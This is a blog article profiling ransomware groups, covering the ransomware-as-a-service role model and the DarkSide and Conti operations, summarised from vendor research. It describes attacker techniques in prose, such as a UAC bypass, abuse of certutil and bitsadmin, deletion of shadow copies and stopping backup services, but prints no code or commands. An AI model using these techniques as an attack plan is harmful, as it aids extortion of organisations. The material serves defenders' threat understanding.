Destroy the Ransomware Threat: Part 1.2 — Know your enemy!
Hi, I decided to continue this unfinished series of articles aloneside our YouTube videos to focus more on the technical aspects and delve into the details, as per your requests. In this series, I have gone very deep and decided to take my research to a new level by turning it into a book. Before publishing my book, I wanted to advance the article as a separate endeavor. You can find the continuation of this series in my book.
As you know, in the first part of our series on ransomware, we examined in detail how to detect, analyze, and prevent ransomware. Now, we will take a broader view of the topics. Specifically, we will explore who the Threat Actors (TAs) behind ransomware actually are and who is writing these programs.
First, when we hear the term ransomware or any malware, we often imagine a cyber attack group consisting of one or more, for example, a team of five or three people. However, this notion is far from reality. In fact, most ransomware is created and operated under the concept of ransomware as a service. Behind many ransomware attacks, there is a highly skilled group of malware creators and sophisticated Threat Actor (TA) groups who use this software. Most of the attacks are carried out by these TAs.
In this section, we will focus more on these attackers, their structures, and how they operate. We will review conducted research and articles. Our aim here is to understand ransomware groups, learn their movements, and analyze the logic of the attackers. Before understanding ransomware, we need to have a grasp of RaaS (Ransomware as a Service). The concept of RaaS involves providing ready-to-use ransomware structures to individuals who will use ransomware or conduct any form of attack. Various ransomware groups develop their products with an ‘as a service’ structure to increase their profits and reduce their risk surface. The developed software is usually designed to be used by different attackers. The creation and use of such software involve many different teams. When examining the presence of these teams, many researchers have noticed that different teams are involved in attack intervention operations.
In a ransomware attack, there are various workgroups within the attack groups working in different roles. Northwave Cybersecurity categorizes these roles into seven positions and adds the following: ‘… Each role follows from the objective of the activities that are carried out within the attack. In the past, we would see each of these roles fulfilled by the same actor. However, in recent years, we have seen that more and more actors are specializing in a single role within this model.’ When these structures and forms are examined, they seem quite logical. Therefore, while identifying the attackers, we will base our understanding on Northwave Cybersecurity’s model.”
Ransomware Affiliate
In this part, researchers have observed that when examining various initial access attempts and the tactics used in these attempts, the lateral and vertical movements following the attack were the same. They even found that although the ransomware differed, the operational style of ransomware distribution was the same. This significantly increased the likelihood that the threat actor associated with these ransomware could be the same group. According to Northwave, this indicates that most major ransomware producers are currently using the ‘Ransomware as a Service’ model. This is how the ransomware affiliate role interacts.
Data Manager
This team is responsible for data exfiltration. In their research, Northwave’s team of researchers discovered that TAs (Threat Actors) using RaaS (Ransomware as a Service) were exfiltrating data while advancing within the network. Therefore, they have assigned data exfiltration activities to a different team and role.”
Ransomware Operator
According to Northwave researchers, the use of RaaS facilitates the ransomware business model, with certain individuals within the TA (Threat Actor) assuming the role of ransomware operator responsible for tasks such as ransomware development and infrastructure hosting.
Negotiator
Northwave researchers found that when communicating with TAs (Threat Actors) using ransomware, the person they spoke to often did not have extensive technical knowledge. It seemed they were not well-versed in operations either. In fact, when making price offers, these intermediaries sometimes asked for permission to consult their superiors. Additionally, during a second conversation, they sometimes encountered different individuals, and the new intermediary was not aware of the previous discussions. This led them to attribute significance to this role.”
Chaser
The individuals in this role were observed to continually pressure the victim and the victim’s employees, threatening to leak their data. Northwave researchers noted that these threats followed specific scenarios. They even discovered that sometimes these individuals were unaware of whether negotiations were still ongoing. This led them to believe that this role was operated by a different actor.
Accountant
This role pertains to the laundering, mixing, and sometimes managing of the obtained revenue.
You must read this fantastic article series.
When we look at ransomware groups, there are active ones that have not yet been arrested. Some of these include DarkSide, BlackMatter, Conti, Ryuk, NetWalker, Dharma, Sodinokibi (REvil), DoppelPaymer, Pysa (Mespinoza), Avaddon, CL0P, BABUK LOCKER, Nefilim, RagnarLocker, Lockbit, HelloKitty, OnePercent, and Diavol. Let’s examine these groups.”
DarkSide
DarkSide ransomware is notorious for its highly destructive attacks that have impacted many companies listed on the NASDAQ. In its attack on Colonial Pipeline, which forced the company to shut down its OT network for two days, it managed to cut off a significant portion of gasoline supply in the eastern United States.
While researching DarkSide ransomware, I came across the article ‘A defender’s view inside a DarkSide ransomware attack’ written by the Sophos Rapid Response team, who have frequently encountered this malware. The article contains great information about DarkSide. I highly recommend you check it out. In this part of our series about DarkSide, we will be utilizing insights from this Sophos article.
The tools most commonly used by TAs (Threat Actors) in the RaaS (Ransomware as a Service) operations of DarkSide Ransomware are as follows.”
According to the Sophos team, DarkSide operates in the same style as double extortion ransomware operators like Maze and LockBit. It leaks the victims’ data before encrypting it, threatening to release the information publicly if the victims do not pay for the decryption key. In their ransomware campaigns, as mentioned above, they again follow a single style, showing similar behaviors typical of an actor utilizing RaaS. They observed that the initial contact, independent of this actor, was made through phishing and the use of stolen credentials.
What sets DarkSide apart is that it also operates on Linux. According to Sophos researchers, DarkSide TAs (Threat Actors) do not act as quickly as those in other ransomware campaigns. They conduct reconnaissance operations that last weeks or even months.
Sophos researchers found that DarkSide TAs (Threat Actors) continuously exfiltrated data during their time inside the network. They uploaded the stolen files to Mega or pCloud.
Notes from Sophos researchers:
- Before encrypting files, DarkSide adds a unique file extension to the name of each targeted document type.
- It checks the administrative privileges of the user account it is working with, and if they are not present, it attempts to elevate its privileges using the CMSTP UAC bypass technique.
- It retrieves the MAC address of the victim’s network adapter and then calculates the CRC32 of the first six bytes of the adapter’s MAC address five times; the initial seed is 0xDEADBEEF.
- They also observed that the attackers terminated services related to Commvault and Veeam’s enterprise backup software, shut down MailEnable mail server software, and terminated SQL server database services to encrypt any databases they found.
- Like other ransomware, it deletes Volume Shadow Copies.
- Renaming the file with a new extension before encrypting it breaks the association between the document file type and the related application, giving the attacker the ability to make it appear as though everything has been encrypted.
The encryption process for DarkSide always has followed these steps:
Researchers have found that DarkSide adds a black lock image file named with the same eight-character extension used to rename each targeted file to the %APPDATA%\Local directory. It then writes a Windows Registry key in HKEY_CLASSES_ROOT that associates files with this unique and specific file extension to the icon file, giving the encrypted files their own unique icon.
The ransom demand screen on the dark web appears as follows:
You must read this excellent article about DarkSide.
Now, let’s also examine the excellent article recently written by the Cybereason Nocturnus Team, titled ‘Cybereason vs. DarkSide Ransomware.’
The Cybereason Nocturnus team also focuses on the double extortion strategy initially. This technique ensures that even if the victim company restores its data from offline backups, it still faces the threat of data leakage. The team notes that before the ransomware spreads, the attackers conduct a full-scale, sophisticated attack operation and deeply infiltrate the organization, specifically targeting the Domain Controller (DC). They mention that the group avoids attacking government institutions and carefully selects their targets, which consist of high-value private companies. They also state that a portion of the money they obtain is donated to charities and provide documentation to support this claim.
Now, let’s look at what a TA (Threat Actor) using DarkSide does to gain initial access to an organization and assess its attack potential, according to Cybereason’s analysis.
- The attackers use PowerShell with the ‘DownloadFile’ command to download the malicious file as ‘update.exe’, abusing Certutil.exe and Bitsadmin.exe in the process. Below, we can review the flowchart prepared by the Cybereason team.
After downloading the file to the Windows folder, the attackers create a shared folder on the victim machine and use it to download a copy of the malware. According to Cybereason analysts, the attacker then starts lateral movements to reach the Domain Controller (DC) using the corporate network. Once the attacker reaches the DC, they ensure the extraction of sensitive information and the SAM hive. Subsequently, they use PowerShell on the infected computer to pull the malware onto the PC. To achieve double extortion, after exfiltrating all data, they distribute the file from the shared folder on the DC to other assets using bitsadmin.exe to maximize damage.
You can also access the malware analysis of the DarkSide malware conducted by the Cybereason team in the same article. Below, you can review the MITRE ATT&CK Mapping prepared by the team:
Additionally, you can review the infection routine map from the malware analysis shared by the Trend Micro team below, and you can examine the details via the provided link;
Conti Ransomware
When I reviewed the research and malware analysis articles on Conti malware, I found Jovi Umawing’s article from Malwarebytes Labs particularly interesting.
Jovi’s article begins by describing the incident where Ireland’s publicly funded health system, the Health Service Executive (HSE), fell victim to a Conti ransomware attack, which occurred a week after DarkSide’s attack on the Colonial Pipeline systems in the US. The attack affected 80,000 endpoints. Moreover, HSE was not Conti’s only healthcare target. In the USA, over 290 healthcare and first responder organizations were targeted in total. It seems they operate with an ethic and mindset completely opposite to that of DarkSide.
In the continuation of the article, it is mentioned that this malware was created and distributed by a group called Wizard Spider, the same Russian TA responsible for the infamous Ryuk. It is also offered to affiliated TAs as RaaS (Ransomware as a Service). The initial points of contact for this malware to reach a corporate network are remote desktop protocol (RDP), phishing attacks, and vulnerabilities. Jovi also notes that in their phishing campaigns, the group famously uses Google Doc URLs, which facilitate the download and execution of Bazar or IcedID. The associated TA uses tools like RDP, PsExec, and Cobalt Strike. According to CrowdStrike, files are encrypted using a combination of AES-256 and RSA-4096 through Microsoft CryptoAPI.
The fate of the group began to decline with the onset of the Russia-Ukraine war, when they declared their support for Russia. From an account called ‘ContiLeaks’ on X (formerly Twitter), chats and files from the secret and encrypted XMPP servers of the Conti and Ryuk ransomware gang were leaked. In the latest article published by Heimdal Security about the group, it is suggested that this leak was carried out by a gang of Ukrainian origin. You can access this excellent article below;
The contents of the leaked messages and files are as follows:
- chat messages
- salary structures
- the threat group’s day to day activities
- the group’s structure
- bitcoin addresses
- law enforcement evading methods
- the BazarBackdoor API
- photos of storage servers
After a major attack targeting the Costa Rican government, Conti shut down its website and ceased its operations. Here, there is a part that truly demonstrates how different ransomware operations are from other cyber attacks.
Unlike APT groups, cyber terrorism, or activism groups, advanced ransomware groups, even if they are disbanded, caught, or exposed and leaked, still have a product that can be sold, stolen, or modified and brought back into operation. This is because there is a cyber organism resulting from the development environment, which is subject to the professionalism of the related organization. The main starting point of the RaaS (Ransomware as a Service) service model is this. When developing a product, you may need many people. During development, these individuals can be replaced by new ones or excluded from the operation. However, once the development is complete and a ready-to-use inventory is available, far fewer but more competent personnel will be needed compared to the development team, considering the complexity and usability of the inventory. This is why both the RaaS model and new ransomware groups, as well as the rebranding of these software, emerge.
This is what happened with Conti. Heimdal Security mentions that the products and perhaps the work experiences left behind by Conti have spread to other threat groups like BlackCat, Hive, Bazarcall Collective, or Karakurt.
I hope you enjoyed my article. I will soon be publishing my subsequent research and compilations in a book. I will offer the book for free. Have a great day, everyone.
